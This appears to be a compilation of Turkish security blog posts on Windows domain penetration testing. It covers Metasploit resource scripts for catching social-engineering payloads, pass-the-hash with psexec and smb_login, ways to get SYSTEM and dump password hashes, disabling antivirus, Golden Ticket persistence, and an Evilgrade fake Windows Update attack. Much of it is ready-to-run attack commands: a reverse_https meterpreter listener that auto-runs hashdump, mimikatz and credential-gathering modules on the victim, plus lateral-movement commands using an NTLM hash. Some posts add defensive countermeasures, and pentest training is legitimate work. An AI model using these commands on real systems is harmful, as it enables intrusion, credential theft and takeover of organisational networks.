Sosyal Mühendislik Sızma Testlerinde Betiklerin ve Loglamanın Kullanılması

Sosyal Mühendislik Sızma Testlerinde Betiklerin ve Loglamanın Kullanılması

Sosyal mühendislik saldırılarındaki temel sorunlardan birisi gönderilen zararlı uygulamanın kurban tarafından ne zaman çalıştırılacağının bilinmemesidir. Bu sebeple konsolun başında beklemek çok pratik değildir. Bu durum, MSF exploit/multi/handler modülünün betiklerle kullanılması sosyal mühendislik saldırılarında önemlidir. Betikler kullanmanın yanı sıra, sızma testlerine ait sonuçları raporlamak ve saldırı sonucunda elde edilen bilgileri listelemek amacıyla loglamanın etkinleştirilmesi de sosyal mühendislik sızma testlerinde önemli bir durumdur.

Bu yazıda sosyal mühendislik amacıyla oluşturulan zararlı yazılımın kurban bilgisayara gönderildiği varsayılarak, MSF multi/handler modülü yapılandırılacak ve saldırı sonuçları incelenecektir. Bu işlemler 3 adımda gerçekleştirilecektir.

i) MSF multi/handler modülünü başlatacak "MultiHandlerinBaslatilmasi.rc" adlı betik ve Meterpreter kabuğu elde edildikten sonra çalışacak olan komutları içeren "SosyalMuhendislik_MeterpreterKomutlari.rc" adlı betik hazırlanacaktır.
ii) MSF multi/handler modülü başlatılacak ve kurbanın çalıştırdığı zararlı uygulamanın meterpreter bağlantısı elde edilecektir.
iii) Kurban tarafından çalıştırılan zararlı uygulamanın sonuçları, MSF komut satırından ve loglardan incelenecektir.

i) Betiklerin Hazırlanması

Öncelikle bir dizinde (/root/Desktop/ gibi) MultiHandlerinBaslatilmasi.rc adlı bir betik oluşturulur ve içerisine aşağıdaki gibi komutlar girilerek, modülün çalışma parametreleri verilir.

spool /root/Desktop/Log.log
set PROMPT %red%L %yel%H %blu%U %whi%T 

set ConsoleLogging true
set LogLevel 5
set SessionLogging true
set TimestampOutput true 

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 172.16.67.120
set LPORT 443
set VERBOSE true
set ExitOnSession false
set SessionCommunicationTimeout 3000
set SessionExpirationTimeout 1209600
set AutoRunScript multi_console_command -rc /root/Desktop/SosyalMuhendislik_MeterpreterKomutlari.rc
exploit -j

Yukarıdaki komutların işlevi özetle aşağıdaki gibidir:

• Masaüstüne Log.log adlı dosya oluşturulur ve çalışacak olan komutların çıktıları bu dosyaya yazdırılır.
• Konsolda saldırganın bilgisayarına ait bazı bilgilerin (IP / bilgisayar adı / hesap adı / tarih) girilmesi sağlanır.
• Loglamalar etkinleştirilir.
• MSF multi/handler modülü başlatılıt.
• "ExitOnSession" seçeneği ile bir kere oturum elde edildikten sonra modülün gelen talepleri alamya devam etmesi sağlanır.
• Oturum için zaman aşımları ayarlanır.
• En önemli maddelerden biri olarak da, "AutoRunScript" parametresi ile oturum elde edildikten sonra çalıştırılması istenen komutların yazılı olduğu betik belirtilir.

MSF multi/handler modülünün çağıracağı betik (SosyalMuhendislik_MeterpreterKomutlari.rc) içeriği aşağıdaki gibi ayarlanabilir:

sysinfo
getsystem
ifconfig
netstat
ps
run hashdump
run post/windows/manage/smart_migrate
run checkvm
run post/windows/gather/cachedump
run post/windows/gather/dumplinks
run post/windows/gather/credentials/gpp
run post/windows/gather/checkvm
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/winscp
load mimikatz
wdigest

Yukarıdaki komutların işlevi özetle aşağıdaki gibidir:

• Kurbana ait bilgisayarın işletim sistemi, IP adresi, ağ üzerindeki anlık trafiği, o anda çalışan prosesler gibi temel bilgiler elde edilir.
• Bilgisayardaki yerel hesaplara ait parola özetleri elde edilir.
• explorer.exe gibi daha stabil bir prosese sıçranır.
• Bilgisayarın sanal makine veya fiziksel makine olup olmadığı kontrol edilir.
• Uygulamalardan veya disk üzerinden bazı kritik bilgiler aranır.
• Bilgisayarın RAM'i üzerinden parolaların açık hali elde edilir.

Bu 2 betik dosyası masa üstüne kaydedilmiştir:

ii) Modülün Başlatılması ve Zararlı Uygulamanın Çalıştırılması

MSF modülünün başlatılması için msfconsole aracının "-r" parametresi kullanılabilir. Böylece "MultiHandlerinBaslatilmasi.rc" adlı betik dosyasındaki yapılandırma ayarlarına göre modül başlatılır.

msfconsole -r /root/Desktop/MultiHandlerinBaslatilmasi.rc

Modül yapılandırıldıktan sonra gönderilen zararlı uygulamanın çalıştırılması beklenir.

Not: Zararlı uygulamanın oluşturulmasıyla ilgili ayrıntılı bilgi için bakınız.

Zararlı yazılım çalıştığında MSF konsolunda "AutoRunScript" parametresinde belirtilen betikteki (SosyalMuhendislik_MeterpreterKomutlari.rc) komutlar çalışmaya başlar:

iii) Logların İncelenmesi

En önemli log dosyası masaüstünde oluşan Log.log adlı dosyadır.

Bu dosyada MSF modülünün başlamasından sonraki konsolda gerçekleşen her işlem kaydı bulunmaktadır:

Devamı:

Bunun yanında oturum logu etkinleştirildiği için, /root/.msf4/logs/sessions dizini altında tarihe ve bilgisayar adına göre oluşan bir dosya içerisinde de sadece oturum ile ilgili loglar bulunmaktadır:

Post Exploitation: Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişimin Sağlanması

Post Exploitation: Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişimin Sağlanması

Kurum içine yapılan saldırılarda veya sızma testlerinde bir Domain Admin yetkisini elde eden bir saldırgan etki alanındaki (neredeyse) her bilgisayarı ele geçirmiş olur denebilir. Eğer güven (trust) ilişki varsa diğer etki alanları da tehlike altına girebilir. Bunun yanında yönetim kolaylığı olması açısından saldırıya uğrayan etki alanına dahil olan kritik sistemler de tehlikeye girebilir. Bu sebeplerle etki alanı yönetici hesaplarının korunması kurumlar için oldukça önemlidir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/microsoft-domain-environment-penetration-tests/golden-ticket-generation-by-using-meterpreter-kiwi-extenion-and-mimikatz-tool/

http://www.siberportal.org/blue-team/securing-microsoft-domain-environment/mitigating-the-vulnerability-about-kerberos-golden-ticket/

5) Kıssada Hisse: Önlemler

Etki alanını kurum için oldukça önemlidir. Bir saldırı olması durumunda etki alanındeki kritik nesnelerin (Domain Controller makineleri, Domain Admins veya Enterprese Admins grubu üyeleri,... gibi) güven altında olması oldukça önemlidir. Etki alanını korumaya yönelik atılacak adımlar için bakınız. Ayrıca, gerçekleşen bir saldırı sonucunda kaybedilecek bazı bilgilerin (krbtgt hesabının NTLM parola özeti gibi) kurum etki alanını sürekli olarak tehlike altında bulunduracağı göz önünde bulundurulmalıdır.

Bu yazıda bahsedilen saldırıdan korunmak için gerçekleştirilebilecek işlemler için bakınız.Özetlemek gerekirse,

• Etki alanı saldırılara karşı korunmalıdır. Saldırgan etki alanında yönetici hakkına sahip olamamalıdır. Bu amaçla gerekli sıklaştırma adımları gerçekleştirilmelidir.
• Saldırı gerçekleşmişse, KRBTGT hasabının parolası iki kere sıfırlanmalıdır (resetlenmelidir). Ancak bu durumda manuel olarak başlatılması gereken bazı servislerin başlayamamasına, akıllı kart ile kimlik doğrulayan kullanıcıların yeni bilet talep ederek DC üzerinde yük oluşturmasına,... sebep olabilir. Hatta, bazı durumlarda kullancıların kimlik doğrulayamamasına, bilgisayarların etki alanından düşmesine de sebep olabilir.
• Çok etkili olmasa da 4769 olay kaydı izlenebilir.

Golden Ticket kullanarak etki alanında uzun süreli yetki sahibi olunması şeklinde özetlenebilecek bu saldırı, 2014 Ocak ayında yayınlanmış olmasına rağmen daha önce kullanılmadığı anlamına gelmemektedir. Bu sebeple, özellikle 2014 yılından itibaren, etki alanına yapılan saldırıların incelenmesi ve DC'ye yetkisiz / uygunsuz erişimlerinin elde edilip edilmediğinin tespit edilmesi, bunun sonucunda da gerekli değişikliklerin yapılması kurum etki alanını korumak için önem arz etmektedir. Özellikle kritik kurumlar için, bu kontrollerin geçmişe yönelik gerçekleştirilmesi ve gerekli müdahalelerde bulunulması gerekmektedir.

Kaynak:
http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
http://rycon.hu/papers/goldenticket.html
https://www.christophertruncer.com/golden-ticket-generation/

Etki Alanı Sızma Testi İçin Eğitim Amaçlı Örnek Senaryo

Etki Alanı Sızma Testi İçin Örnek Senaryo

Önceki yazıda etki alanı sızma testinin nasıl gerçekleştirildiğine dair örnek bir metodoloji sunulmuştu. Bu yazıda EĞİTİM AMAÇLI örnek bir senaryo gerçekleştirilecektir.

Ortam Bilgisi

Hazırlanan senaryoda 6 bilgisayar kullanılmaktadır:

1) XP: Standalone bir bilgisayardır. C diskinde kritik bilgi (SAM/SYSTEM dosyaları) bulunacaktır.
2) W7: Etki alanına dahil olan istemci bilgisayardır.
3) W7-Test: Etki alanına dahil edilecek olan istemci bilgisayardır. Etki alanında "Domain Admins" grubuna üye olan kullanıcının standart hesabı ile oturum açılacaktır. Üzerinde antivirüs yüklüdür. Üzerinde yüklü olan Winscp içerisinde bir de UN/PW kayıtlı bulunmaktadır. Ayrıca DC bilgisayarına RDP ile bağlantı kurulmuştur.
4) DC: Etki alanı denetleyicisidir.
5) S_Kali: Saldırı amacıyla kullanılacak KALI bilgisayardır.
6) S_W7: Saldırı amacıyla kullanılacak W7 bilgisayardır. 

Senaryo Videosu

Senaryo ile ilgili video aşağıdaki gibidir:

Videoyu indirmek için tıklayınız.

Senaryo Adımları

Senaryo 7 adımdan oluşmaktadır:

1) XP bilgisayara sızılacak ve kritik bir bilgi (C:\SAM ve C:\SYSTEM) edinilecektir.
2) 1. adımda elde edilen kritik bilgi ile etki alanına dahil olan W7 bilgisayarına erişim sağlanacaktır. Bu bilgisayardan yerel kullanıcıların parola özetleri elde edilecektir.
3) 2. adımda elde edilen yerel kullanıcıların parola özetleri ile W7-Test bilgisayarına (AV'e yakalanmadan) sızılacaktır.
4) W7-Test bilgisayarındaki mevcut kullanıcı oturumuna erişim sağlanacak. Bu bilgisayarda DC makineye yapılan RDP'ye fark edilecek. Oturum açan (Sizma\Cemil Ustun) ve Domain Admins grubundaki bir kullanıcının ("Sizma\Cemil.ustun2") parolası elde edilecek.
5) W7-Test bilgisayarına "Sizma\Cemil Ustun" adlı kullanıcı haklarıyla RDP yapılacaktır. W7-Test bilgisayarındaki AV devre dışı bırakılacaktır.
6) W7-Test bilgisayarına MSF psexec ile bağlanılacak ve Winscp ile kayıtlı bağlantı bilgileri elde edilecektir.
7) Etki alanındaki kullanıcıların parola özetleri elde edilecektir.

Senaryo Adımlarına Yönelik Resimler:

0) Ağ Keşfi ve Zafiyet Taramasi 

1) Zafiyetin Sömürülmesi: MS08-067

1-2 Geçişi) SMB Oturum Sorgulaması

2) W7 Bilgisayarına PTH ile Erişim

3) WCE ile PTH & RDP Etkinleştirme

4) Parola Çalma & Domain Admin Olma

5) AV Kapatma

6) WinSCP’de Kayıtlı Parolalarını Elde Etme

7) Domain Hesaplarının Parola Özetleri

Etki Alanı ve Son Kullanıcıları Sızma Testi Metodolojisi

Etki Alanı ve Son Kullanıcıları Sızma Testi Metodolojisi

Microsoft domainin kullanıldığı sistemlerde yerel yönetici hesaplarına çok fazla ihtiyaç olmamakla birlikte, gerek sistem destek elemanları tarafından olsun, gerekse yerel yönetici haklarına ihtiyaç duyan yazılım geliştiriciler veya benzeri kullanıcılar tarafından olsun, bu hesaplar hâlâ kullanılabilmektir. Yerel yönetici hesapları ile çalışan bir kullanıcının hakları ile bir makineye sızıldığı takdirde, bu makinede normal kullanıcılar tarafından mümkün olmayan birçok saldırı gerçekleştirilebilmektedir. Örneğin; makinedeki şifre özetlerinin alınabilir veya o makinede oturumu halen aktif olan hesapların hakları kullanılabilir. Bu sebeple bir bilgisayarda yerel yönetici haklarının ele geçirilmesi sızma testi için oldukça önemlidir.

Kurumlarda yönetim kolaylığı için veya varsayılan ayar olarak kaldığı için birçok yerel yönetici hesabının ismi ve şifresi diğer birçok kullanıcı bilgisayarında da aynı olabilmektedir. Sonuç olarak bir makineden ele geçirilen yerel yönetici şifre özetleri, aynı şifreyi kullanan diğer bütün makineleri ele geçirmek amacıyla kullanılabilmektedir. Bu sebeple aynı parola özetlerinin kullanılması sızma testi için oldukça önemlidir.

Etki alanı ve son kullanıcıları bilgisayarları sızma testlerindeki hedef - aynı şifreyi kullanan diğer bütün bilgisayarları ele geçirmekten ziyade - domain admin kullanıcısının şifresini/biletini elde etmek ve/veya domain controller makinesine yetkili kullanıcı ile erişebilmektir. Domain yöneticisi hesapları, domaine dâhil makinelerde yüksek yetkilere sahip olmalarından dolayı kritik hesaplardır. Herhangi bir şekilde ele geçirilen bir domain yöneticisi hesabının sahip olduğu hakları kullanılarak domaine dâhil bütün sunuculara ve kullanıcı makinelerine erişilebilir. Bu erişim sonucunda bütün domain kullanıcılarının parolaları veya parola özetleri alınabileceği gibi,  ele geçirilen makinelerde; kritik bilgi içeren dosyaların incelenmesi, iletişim hattının kaydedilmesi, “key logger” çalıştırma gibi saldırılar da mümkündür. Bu saldırıların sonucunda daha kritik olan gizli bilgilere erişilebilmesi an meselesidir.

Etki alanı ve son kullanıcıları sızma testinin metodolojisi temel olarak aşağıdaki gibidir:

Etki alanı ve son kullanıcıları bilgisayarları sızma testi için akış şeması

Akış şemasının özetle şu şekildedir:

0-1-2-3) Bir makinedeki açıklıktan faydalanarak, o makinenin yerel yöneticiye ait hesap bilgileri ele geçirilir. Bu hesap bilgileri kullanıcı adı ve o kullanıcıya ait şifre ve/veya şifrenin özetidir.
4-7-8) Bu makineden domain hakkında bilgi edinilir. Bu makinedeki yerel kullanıcının hesap bilgileri ile domaindeki diğer makinelere sızılır.
5-6) Sızılan makinelerde domain yöneticisi veya domain üzerinde yetkili kullanıcıya ait şifre, şifre özeti veya bilet aranır.

Bu adımların nasıl gerçekleştirildiği hakkında ayrıntılı bilgi aşağıdaki sayfalar izlenerek edinilebilir:

0 - Makineye Fiziksel Olarak Erişerek CD/USB'den Boot Edilmesi

http://ertugrulbasaranoglu.blogspot.com.tr/2012/12/ipucu-makineye-fiziksel-olarak-eriserek.html

1 - Zafiyet Taramasının Gerçekleştirilmesi

http://ertugrulbasaranoglu.blogspot.com.tr/2012/12/ipucu-zafiyet-taramasnn.html 

2 - Zafiyetin Kullanılarak Bir Bilgisayara Sızılması

http://ertugrulbasaranoglu.blogspot.com.tr/2013/08/ipucu-zafiyetin-kullanlarak-bir.html 

3 - Yerel Yöneticilere Ait Şifre Özetlerinin Ele Geçirilmesi

http://ertugrulbasaranoglu.blogspot.com.tr/2013/09/ipucu-yerel-yoneticilere-ait-sifre.html 

4 - Hedef Makineden Sistem ve Domain Hakkında Bilgi Edinme

http://ertugrulbasaranoglu.blogspot.com.tr/2012/12/ipucu-ms08-067-zafiyetinin-kullanlmas.html

7 - smb_login Modülü ile Yayılabilecek Makinelerin Belirlenmesi

http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-smblogin-modulu-ile-yaylabilecek.html

8 - psexec Modülü ile Yeni Makinelerde Oturumun Açması

http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-psexec-modulu-ile-yeni.html

5 - Yüksek Yetkili Kullanıcı Haklarının İncelenmesi

http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-yuksek-yetkili-kullanc-haklarnn.html

6 - Domainde Yetkili Kullanıcının Haklarına ve Şifresine Sahip Olma

http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-domainde-yetkili-kullancnn.html

Her bir sayfada gerçekleştirilen adımın amacı, yöntemi ve bu saldırı adımından korunulması için gerçekleştirilmesi gerekilen önlemler belirtilmiştir.Etki alanı ve son kullanıcılarına karşı gerçekleştirilen saldırılardan ve sızma testinden korunmak için alınması gerekilen önlemler için bakınız.

Etki alanı sızma testi ile ilgili örnek bir senaryo için tıklayınız.

İpucu: hashdump Hatası: priv_passwd_get_sam_hashes

hashdump Hatası: priv_passwd_get_sam_hashes

Meterpreter kabuğuna SYSTEM hakları ile düşüldükten sonra, yerel kullanıcı parola özetlerini almak için Meterpreter kabuğunda hashdump komutunu çalıştırmak gerekir. Meterpreter hashdump komutu, LSASS prosesine kod enjekte eder, CreateThread() fonksiyonunu çağırır ve enjekte edilen kod da LSASS içerisinden parola özetlerini alıp ekrana bastırır. Ancak artık bir çok AV ve HIPS gibi güvenlik mekanizmaları bahsedilen API çağrılarını önlerler. Bu sebeple Meterpreter hashdump çalışmayabilir. Bu ve benzer sebepelerle aşağıdaki gibi bir hata alınabilir:

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Bu durumlarda aşağıdaki işlemler denenebilir:

1) getsystem çalıştırılır. Örnek:

Kaynak: http://www.offensive-security.com/metasploit-unleashed/Pivoting
"getsystem" komutu ile ilgili ayrıntılı bilgi için bakınız.

2) Modül olarak hashdump kullanılır.

Not: Bu modül kayıt defterindeki SAM/SYSTEM anahtarlarını kullanır. Bu modülün çalışması için yönetici hakkı yetmez, SYSTEM haklarını ele geçirmek gereklidir.

Kaynak:
http://securityweekly.com/2014/10/post-exploitation-metasploit-and-windows-hashes.html

3) priv eklentisi yüklendikten sonra SYSTEM hakkı alınır.

Kaynak: http://www.offensive-security.com/metasploit-unleashed/Privilege_Escalation

4) getprivs komutu çalıştırılır. Daha sonra da Meterpreter hashdump veya diğer teknikler denenebilir.

5) MSF bypassuac modülü ile UAC kapatılır (Çalıştığını hiç görmedim)

6) Kayıt defterinden SAM ve SYSTEM dosyası alınır ve BT makinesine indirilir.

Kaynak:
http://ertugrulbasaranoglu.blogspot.com/2013/07/ipucu-kayt-defterinden-sam-ve-system.html

7) Prosesler listelendikten sonra başka bir prosese atlanır. Atlanan prosesin SYSTEM hakları ile çalışan ama winlogon’dan büyük olmayan bir proses olması tavsiye edilir. Svchost.exe dosyası sıçramak için iyi bir proses sayılır. (Aşağıdaki örnekte DA olan kullanıcının prosesine sıçranmıştır.)
Proseslerin listelenmesi: ps

Prosese sıçranması: migrate ProsesID

8) Modül olarak migrate kullanılır.

Kaynak: http://www.offensive-security.com/metasploit-unleashed/Windows_Post_Manage_Modules#migrate

9) Prosese sıçramak için Incognito da kullanılabilir.
Bu amaçla önce tokenlar listelenir:

Sonra da jeton alınır.

Kaynak: http://www.offensive-security.com/metasploit-unleashed/Fun_With_Incognito

10) SYSTEM hakları varken Windows kabuğuna düşülerek yerel bir yönetici oluşturulur.

Daha sonra da psexec ile o kullanıcı hesabı ile bağlantı kurulur.
• RHOST: ms08_067 zafiyetinin bulunduğu bilgisayarın IP bilgisi
• SMBPass: Yeni oluşturulan kullanıcının parolası (TestP@ss123)
• SMBUser: Yeni oluşturulan kullanıcının adı (TestYerelKullanici)
• LHOST: Kendi bilgisayarımızın IP bilgisi

Kaynak: http://ertugrulbasaranoglu.blogspot.com/2013/10/ipucu-psexec-modulu-ile-yeni.html
Daha sonra da hashdump denenir.

11) SYSTEM hakları varken Windows kabuğuna düşülerek yerel bir yönetici oluşturulur.

Daha sonra da o bilgisayara RDP ile girilip, Cain&Abel ile alınabilir. Veya SAM ve SYSTEM dosyası alınabilir. Online olarak almak için aşağıdaki işlemler uygulanabilir:
http://ertugrulbasaranoglu.blogspot.com/2013/08/ipucu-yerel-hesap-bilgilerinin.html
http://ertugrulbasaranoglu.blogspot.com/2013/07/ipucu-kayt-defterinden-sam-ve-system.html

12) MSF smart_hashdump post modülü kullanılır.

MSF smart_hashdump post modülü şu şekilde çalışır:

• Sahip olunan yetki, işletim sistemi, rolü (DC olup olmadığı) belirlenir.
• SYSTEM hakkına sahip olunmuşsa, kayıt defterinden SAM anahtarının altı okunur.
• DC ise, LSASS içerisine kod enjekte edilir.
• İşletim sistemi Windows Server 2008 ise ve yönetici haklarına sahip olunmuşsa, şu 3 adım gerçekleştirilir: Meterpreter getsystem komutu ile SYSTEM hakkı elde edilir. Eğer hata alındı ise, SYSTEM hakkıyla çalışan bir prosese sıçranır. Sonrasında da LSASS prosesine kod enjekte edilir.
• İşletim sistemi Wİndows 7 ve üzeri bir işletim sistemi, UAC devre dışı ve yönetici haklarına sahip olunmuşsa, Meterpreter getsystem komutu ile SYSTEM hakkı elde edilir ve kayıt defterindeki SAM anahtarı okunur. 
• İşletim sistemi Wİndows 2000/2003 veya XP ise, Meterpreter getsystem komutu ile SYSTEM hakkı elde edilir ve kayıt defterindeki SAM anahtarı okunur.

Kaynak:

http://securityweekly.com/2014/10/post-exploitation-metasploit-and-windows-hashes.html

13) Volume Shadow Copy ile SAM/SYSTEM/NTDS.dit dosyası alındıktan sonra bu dosyalar analiz edilir. NTDS.dit ve SYSTEM ile DC üzerinden domain kullanıcılarına parola özetlerinin elde edilmesi için bakınız.

İpucu: psexec Modülü ile Yeni Makinelerde Oturumun Açması

psexec  Modülü ile Yeni Makinelerde Oturumun Açması

Amaç
Organizasyondaki - yerel kullanıcısı ve şifresi / şifre özeti bilinen - diğer makinelerde oturum açılacaktır.

Yöntem
Bir önceki yazıda smb_login modülü ile girilebilecek bilgisayarlar tespit edilmişti. Bu adımda ise psexec modülü ile giriş denemesi yapılacaktır.
psexec modülü incelenir:

search psexec
use exploit/windows/smb/psexec
show options

psexec modülünün incelenmesi

Seçilen modül hakkında ayrıntılı bilgi elde edinilebilir:

info exploit/windows/smb/psexec

psexec modülü hakkında ayrıntılı bilginin listelenmesi

Seçenekler uygun şekilde ayarlanır:

set RHOST 192.168.172.243
set SMBPass aad3b435b51404eeaad3b435b51404ee:da8aef7a322d9ecf8d1d7e220f837176
set SMBUser administrator
set PAYLOAD windows/meterpreter/reverse_tcp
show options

psexec modülünün düzenlenmesi

Not: Domainde ilk olarak girdiğimiz bilgisayarda, "net share" komutu çalıştırıldığında “ADMIN$” paylaşımının açık olduğunu gördüğümüz için, SHARE seçeneğini aynen bırakabiliriz.

Modülü çalıştırmak için ve elde edilen bağlantıları listelemek için aşağıdaki komutlar kullanılır :

exploit
sessions -l

psexec modülü ile exploit işleminin gerçekleştirilmesi

Not: PsExec bir çok AV tarafından tespit edilebilmektedir. Bu sebeple, bağlantıda belirtildiği gibi WCE aracı kullanılarak da hedef sistemin dosya sistemine erişilebilir, bağlantıdaki gibi WCE & MS psexec aracı kullanılarak Windows ve Meterpreter komut satırları elde edilebilir, bağlantıdaki gibi MSF psexec_command modülü kullanılarak Meterpreter komut satırı elde edilebilir, bağlantıdaki gibi Kali pth-winexe aracı kullanılarak Windows ve Meterpreter komut satırları elde edilebilir.

Not: MSF PsExec modülü çalıştırıldığında gerçekleşebilecek hatalar için bakınız.

Önlem

• Önceki adımlarda belirtilen önlemler alınmalıdır.

İpucu: smb_login Modülü ile Yayılabilecek Makinelerin Belirlenmesi

smb_login Modülü ile Yayılabilecek Makinelerin Belirlenmesi

Amaç

• Port taraması ile SMB (Server Message Block protokolü) dosya paylaşımını sağlayan TCP 445. portu açık olan makineler bulunacaktır.
• Elde edilen bir yerel kullanıcı hesap bilgilerinin, organizasyondaki diğer makinelerde de yetkili olup olmadığı belirlenecektir.

Yöntem
Önceki adım ile elimizde sadece bir makinede yerel yönetici hesabı dahil olmak üzere yerel kullanıcı hesaplarına ait şifrenin özeti bulunmaktadır:

Hedef makinedeki kullanıcıların şifre özetlerinin listelenmesi

Bu özet halindeki şifreyi ve Administrator (yerel yönetici) kullanıcısı kullanarak, diğer makinelere de girilmeye ve böylece organizasyondaki diğer makinelere yayılım gerçekleşecektir. Yayılım işlemi; port taraması yapıldıktan sonra veya direk olarak zafiyetle ilgili modül kullanılarak gerçekleştirilebilir.
SMB dosya paylaşım portu (TCP/445) açık olan makinelerin bulunması nmap komutu ile (veya Zenmap kullanarak) gerçekleştirilebilir:

nmap –Pn –sT –p 445 192.168.172.0/24 --open

nmap komutu ile 445. portu açık olan makinelerin tespit edilmesi

Büyük bir ağda çok uzun bir sonuç gelebileceğinden sadece IP’lerin alınmasını isteyebiliriz. Bunun için düzenli ifadeler (regex) kullanılabilir:

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep -oE '.*((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])'

veya

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep –oE '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}'

veya

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep –oE ‘[0-9]{1,3}[\.]'

nmap komutu ile 445. portu açık olan makinelerin listelenmesi

SMB dosya paylaşımı açık olan IP'ler bulunduktan sonra sadece bu makinelere sızılmaya çalışılabildiği gibi, tüm ağdaki makineler için de sızma işlemi denemesi yapılabilir.
Sızma işlemini deneyeceğimiz makinelerde, hashdump ile şifresinin özetini elde ettiğimiz yerel yönetici hesabı ile aynı şifreyi kullanan kullanıcılar araştırılır:

search smb_login
use auxiliary/scanner/smb/smb_login
show options

smb_login modülünün incelenmesi

Seçenekler uygun şekilde ayarlanır:

set BLANK_PASSWORDS false
set RHOST 192.168.172.0/24
set SMBPASS aad3b435b51404eeaad3b435b51404ee:da8aef7a322d9ecf8d1d7e220f837176
set SMBUSER administrator
set THREADS 15
set USER_AS_PASS false

smb_login modülünün düzenlenmesi

Exploit işlemi gerçekleştirilir:

exploit

SUCCESSFUL LOGIN sonucunu dönenler "administrator" kullanıcısına ait şifrenin özeti, elimizdeki özet değer ile aynı olan makinelerdir:

smb_login kontrolünde başarılı dönen sonuç örneği

Not: FAILED LOGIN sonucunu dönenler ise başarısız exploit denemeleridir:

smb_login kontrolünde başarısız dönen sonuç örneği

Not: smb_login modülü yerine hedef odaklı olarak smb_enumusers_domain modülü de kullanılabilir. Bu modülle ilgili ayrıntılı bilgi için bakınız:

http://ertugrulbasaranoglu.blogspot.com.tr/2013/11/ipucu-smbenumusersdomain-modulu-ile.html

Önlem

• Ağ üzerinde kurallar tanımlayarak; belirlenen IP’lere, belirlenen portlardan kontrollü bir şekilde izin verilmelidir.
• “administrator” gibi varsayılan yerel yönetici hesaplarının isminin değiştirilmelidir. Böylece yapılacak birçok saldırıda yerel yönetici hesabının isminin kolayca ve otomatik olarak bulunmasını zorlaştıracaktır.
• Organizasyondaki makinelerde bulunan yerel kullanıcıların şifreleri farklı ayarlanmalıdır.
• Yerel yönetici hesaplarının şifreleri,  şifre kırma saldırılarına karşı korumak amacıyla karmaşık seçilmelidir.
• Kullanılmayan ve ihtiyaç duyulmayan yerel yönetici hesapları kaldırılmalı veya devre dışı bırakılmalıdır.

İpucu: Yerel Yöneticilere Ait Şifre Özetlerinin Ele Geçirilmesi

Yerel Yöneticilere Ait Şifre Özetlerinin Ele Geçirilmesi

Amaç

• Yerel kullanıcılara ait şifre özetleri elde edilecektir.

Yöntem
Önceki bir yazıda mevcut zafiyet kullanılarak hedef makineye SYSTEM olarak giriş yapılmıştır. Bu kullanıcı hakları ile SAM/SYSTEM dosya bilgileri elde edilebilir. Hedef bilgisayarın konsoluna geçilebilir.

getuid hashdump shell

Şekil: Hedef makinedeki yerel kullanıcıların şifre özetlerinin elde edilmesi ve makinenin kabuğuna geçilmesi

Hashdump ile ilgili ayrıntılı bilgi ve alınabilecek hata mesajları için bakınız.

Önlem

• Makineye SYSTEM hakları ile sızıldıktan sonra, yerel kullanıcılara ait şifre özetleri elde edilebilecektir. Bu sebeple önceki adımların gerçekleştirilememesi için önlem alınmalıdır.
• Bu adımda elde edilen yerel kullanıcılara ait şifre özetleri, diğer makinelere erişim için kullanılacağından, organizasyondaki makinelerde bulunan yerel yönetici şifrelerinin farklı olması sağlanmalıdır.

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

Uygun şekilde yapılandırılmamaış ağlarda saldırgan, kurban olarak seçtiği bir bilgisayar ile bu bilgisayarın gitmek istediği hedef adresin arasına girebilir. Örneğin Windows işletim sistemini güncellemesini gerçekleştirmek isteyen kurban, Microsoft’un güncelleme sitesine gitmek yerine, saldırganın belirlediği DNS kaydına göre ilgili bir sunucuya yönlendirilebilir. Böylece Windows işletim güncellemesi yerine saldırganın gönderdiği zararlı yazılım yüklenerek kurban bilgisayar, saldırganın eline geçmiş olur.

Bu işlemler 7 adımda incelenecektir:

• Saldırgan ve kurban bilgisayarları birbirlerine olan erişimleri kontrol edilecek
• Evilgrade uygulaması kurulacak ve “winupdate” modülü seçilecek
• “winupdate” modülü ve ilgili diğer kaynaklar ayarlanacak
• Ettercap ile KurbanaDNS spoofing saldırısı gerçekleştirilecek
• Saldırgan, kurban bilgisayardan gelen bağlantı taleplerini dinleyecek olan bir ortamı hazırlayacak
• Kurban işletim sistemini güncellemek için talepte bulunacak ve saldırganın hazırlamış olduğu zararlı uygulamayı indirecek
• Kurbanın zararlı yazılımı çalıştırmasıyla saldırgan kurbanın bilgisayarına bağlanacak ve hak yükseltecek

Erişimlerin Kontrolü
Kurban makine (192.168.100.78), saldırgan makineye erişebilmektedir:

Saldırgan makine (192.168.100.75), kurban makineye erişebilmektedir:

Evilgrade Uygulamasının Kurulumu ve Seçilen Modülün Seçilmesi
Öncelikle www.github.com/infobyte/evilgrade adresinden uygulama sıkıştırılmış bir dosya olarak indirilir:

Bu dosya saldırgana ait Backtrack bilgisayarına kopyalanır ve sıkıştırılmış dosya açılır. Evilgrade betiği çalıştırılır:

Modüllerin yüklenmesi beklenir:

Not: Diğer EvilGrade kurulum metodları için bakınız: http://blog.techdynamics.org/2011/07/howto-install-evilgrade-on-backtrack5.html

Not: Modüllerin listelenmesi için aşağıdaki komut çalıştırılır.

show modules

“winupdate” modülü kullanılmaya başlanır. Kullanılan komutlar aşağıdaki gibidir:

configure winupdate
show options

Not: Betik büyük/küçük harf duyarlıdır.
